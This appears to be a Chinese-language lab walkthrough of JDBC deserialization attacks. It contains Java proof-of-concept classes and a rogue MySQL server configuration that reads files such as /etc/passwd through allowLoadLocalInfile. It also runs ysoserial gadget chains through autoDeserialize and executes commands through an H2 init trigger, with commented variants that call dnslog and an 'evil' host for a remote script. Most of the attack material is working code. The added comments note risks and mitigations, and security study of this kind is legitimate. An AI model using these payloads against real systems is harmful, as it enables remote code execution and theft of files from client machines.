JDBC反序列化漏洞简单利用

JDBC反序列化漏洞简单利用

创建一个 Maven 项目

启动一个恶意的 MySQL 服务端

python2 rogue_mysql_server.py


package poc;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

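/**
 * Opens a plain JDBC connection to a MySQL server with {@code allowLoadLocalInfile=true}.
 *
 * <p>Risk note for readers: with this flag set, Connector/J answers a server-sent
 * {@code LOAD DATA LOCAL INFILE} request by uploading the client-side file the server
 * names. A rogue or compromised server can therefore read files from the machine
 * running this client (the page runs it against a fake server it started itself).
 * Mitigation: keep {@code allowLoadLocalInfile} at its default ({@code false}), treat
 * JDBC URLs and connection properties as trusted configuration rather than user input,
 * and only connect with the flag enabled to hosts you control.
 */
public class TestJDBC {
    /**
     * Entry point: connects and closes the connection without issuing any statement.
     *
     * @param args ignored
     * @throws ClassNotFoundException if the Connector/J driver class is not on the classpath
     * @throws SQLException if the connection cannot be established
     */
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        // JDBC 4+ drivers self-register via ServiceLoader; the explicit load only fails
        // fast when the connector jar is missing.
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "jdbc:mysql://127.0.0.1:3306/mysql?useSSL=false&allowLoadLocalInfile=true&maxAllowedPacket=65535";
        // try-with-resources: the original never closed the Connection.
        try (Connection conn = DriverManager.getConnection(url)) {
            // No statements are issued; the connection setup is all this test exercises.
        }
    }
}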


弹计算器1:

python37 server.py

{
"config":{
"ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
},
"yso":{
"Jdk7u21":["Jdk7u21","calc"]
}
}

PoC 代码

package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


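/**
 * Connects to a MySQL server with {@code autoDeserialize=true} and the
 * {@code ServerStatusDiffInterceptor} query interceptor enabled.
 *
 * <p>Risk note for readers: the interceptor issues {@code SHOW SESSION STATUS} around
 * queries and reads the result with {@code getObject()}; with {@code autoDeserialize=true}
 * a BLOB column that holds a serialized Java object is passed to
 * {@code ObjectInputStream}, so a rogue server controls what gets deserialized. The
 * {@code user=yso_...} value is only a convention of the fake server on this page for
 * choosing a payload. Mitigation: never enable {@code autoDeserialize}, reject
 * {@code queryInterceptors}/{@code autoDeserialize} in URLs that come from outside the
 * deployment, install a JVM-wide {@code ObjectInputFilter} (JEP 290) as defence in depth,
 * and keep the connector up to date.
 */
public class Test2 {
    /**
     * Entry point: connects and closes the connection without issuing any statement.
     *
     * @param args ignored
     * @throws ClassNotFoundException if the Connector/J driver class is not on the classpath
     * @throws SQLException if the connection cannot be established
     */
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        // DNS-callback variant kept from the original for reference:
        // url = "jdbc:mysql://localhost:3306/mysql?characterEncoding=utf8&useSSL=false&maxAllowedPacket=65535&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true" +
        // "&user=yso_URLDNS_http://blqr5c.dnslog.cn/";
        String url = "jdbc:mysql://localhost:3306/mysql?characterEncoding=utf8&useSSL=false&maxAllowedPacket=65535&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true"
                + "&user=yso_CommonsCollections6_calc";
        // try-with-resources: the original never closed the Connection.
        try (Connection conn = DriverManager.getConnection(url)) {
            // Nothing is queried here; the interceptor runs during connection setup.
        }
    }
}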


弹计算器2:

python37 server.py

{
"config":{
"ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
},
"yso":{
"Jdk7u21":["Jdk7u21","calc"]
}
}
package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


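/**
 * Opens an in-memory H2 database whose URL carries an {@code init=} script.
 *
 * <p>Risk note for readers: H2 executes the {@code init=} SQL at connection time, and a
 * {@code CREATE TRIGGER ... AS $$//javascript ... $$} body is source code that the
 * database compiles and runs inside this JVM. Whoever controls the JDBC URL therefore
 * controls code execution in the client process. Mitigation: never build a JDBC URL
 * from user-supplied input, strip or reject {@code init}/{@code INIT} from URLs that
 * are not hard-coded by the deployment, and do not expose H2 connection strings through
 * configuration that untrusted users can edit.
 *
 * <p>Note: the class loads the MySQL driver but connects with an H2 URL; the H2 driver
 * is found via ServiceLoader, so the {@code Class.forName} call only requires the
 * MySQL connector jar to be present and is otherwise unrelated to this test.
 */
public class test3 {
    /**
     * Entry point: connects (running the init script) and closes the connection.
     *
     * @param args ignored
     * @throws ClassNotFoundException if the Connector/J driver class is not on the classpath
     * @throws SQLException if the connection cannot be established
     */
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n"
                + "INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
                + "java.lang.Runtime.getRuntime().exec('calc')\n"
                + "$$\n";
        // Remote-script variant kept from the original for reference:
        //url = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://evil1.dnslog.ceye.io/h2.sql'";
        // try-with-resources: the original never closed the Connection.
        try (Connection conn = DriverManager.getConnection(url)) {
            // Nothing is queried; the init script runs as part of connection setup.
        }
    }
}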
